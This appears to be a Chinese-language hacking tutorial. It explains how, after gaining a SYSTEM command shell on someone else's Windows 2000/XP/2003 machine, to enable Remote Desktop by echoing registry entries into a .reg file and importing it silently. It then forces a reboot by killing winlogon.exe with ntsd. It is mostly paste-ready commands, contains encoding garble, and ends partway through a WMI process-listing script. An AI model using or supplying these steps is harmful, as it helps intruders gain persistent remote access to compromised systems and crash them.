開啟終端的最簡單方法全攻略 -電腦資料

　　今天介紹的這種開終端的方法，綠色，環(huán)保，無污染~~

　　不須上傳任何文件開啟終端的方法適合win2k,XP,2003.

　　本文前提是已經(jīng)通過某種方法得到了對方的一個SYSTEM權限的CMDSHELL~~

　　在無須傳任何文件的情況下開啟終端服務，

開啟終端的最簡單方法全攻略

　　一、win2k下終端開啟終端

　　首先用ECHO寫一個3389.reg文件,然后導入到注冊表，echo代碼如下：

　　echoWindowsRegistryEditorVersion5.00>>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]>>3389.reg

　　echo"Enabled"="0">>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]>>3389.reg

　　echo"ShutdownWithoutLogon"="0">>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>3389.reg

　　echo"EnableAdminTSRemote"=dWord:00000001>>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]>>3389.reg

　　echo"TSEnabled"=dword:00000001>>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>3389.reg

　　echo"Start"=dword:00000002>>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>3389.reg

　　echo"Start"=dword:00000002>>3389.reg

　　echo[HKEY_USERS\.DEFAULT\KeyboardLayout\Toggle]>>3389.reg

　　echo"Hotkey"="1">>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp]>>3389.reg

　　echo"PortNumber"=dword:00000D3D>>3389.reg

　　echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>3389.reg

　　echo"PortNumber"=dword:00000D3D>>3389.reg

　　把這些ECHO代碼到CMDSHELL下貼粘就可以生成3389.reg文件，接著regedit/s3389.reg導入注冊表，

電腦資料

　　(如果要改變終端端口只須把上面的兩個D3D都改一下就可以了)

　　因為win2k下開終端不能像XP一樣可以立即生效,而是需重啟機器后才生效。

　　一個簡單的辦法就是用ntsd.exe(win2k以上自帶的命令)結束一個重要的進程就可以實現(xiàn)機器重啟了�。�

　　比如結束winlogon.exe,lsass.exe也可以但結束后會跳出重啟倒計時(不太好~)

　　winlogon.exe被關閉后機器立刻強制重啟了

　　命令執(zhí)行格式為ntsd-cq-pPID

　　那如何知道winlogon.exe的PID進程號呢~

　　以下這個腳本可以列舉當前所有進程的PID：

　　wscript.echo"PIDProcessName"

　　foreachpsingetobject("winmgmts:\\.\root\cimv2:win32_process").instances_

　　wscript.echops.handle